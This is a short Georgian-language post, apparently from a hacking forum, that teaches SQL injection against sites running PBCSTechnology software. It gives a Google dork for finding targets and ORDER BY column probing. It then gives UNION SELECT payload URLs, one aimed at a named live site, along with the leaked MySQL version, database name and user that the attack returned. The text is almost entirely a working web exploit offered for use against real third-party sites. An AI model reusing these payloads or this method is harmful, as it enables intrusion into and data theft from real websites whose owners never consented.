Sql Injection On Pbcstechnology
გუგლში ვეძებთ:
|
inurl:".php?id=" Powered by PBCSTechnology |
Injection-ს ბევრი რამის გაკეთება შეუძლია,
ეხლა გაჩვენებთ თუ როგორ უნდა გავიგოთMySQL-ს ვერსია Databases სახელი და
ასევე მისი user-ის სახელი...
შენ უნდა იპოვო პირველ რიგში ORDER BY.
სისტემა დაგვიწერს:
მოქმედება: Query Select Error:1222: The used SELECT statements have a different number of columns
ეს ყველაფერი კარგია, ეხლა ჩვენ უნდა დავიწყოთ ექსპლოიტის დაწერა
მაგალითად:
მოქმედება: Query Select Error:1222: The used SELECT statements have a different number of columns
მოქმედება: Query Select Error:1222: The used SELECT statements have a different number of columns
მოქმედება: Query Select Error:1222: The used SELECT statements have a different number of columns
...
|
http://vuln.site/articlenav.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12-- |
ამოგიგდებთ ცხრილს...
შენ შეგიძლია დაიწყო უკვე ინფორმაციის ამოღება.!
მაგალითად:
|
http://www.caje-miami.org/articlenav.php?id=-1+union+select+1,2,3,4,concat_ws(char(58),version(),database(),user()),6,7,8,9,10,11,12-- |
დაგვიწერა შემდეგი:
|
4.0.18-standard-log:caje-miami_org_-_data:caje-miami@localhost.localdomain |
ამით ჩვენ გავიგეთ MySQL-ს ვერსია Database სახელი და ასევე მისი User-ის სახელი...
| ავტორი: სტუმარი |
ნანახია: (1082) დამატების დრო: (2025-06-30)
|
|
|
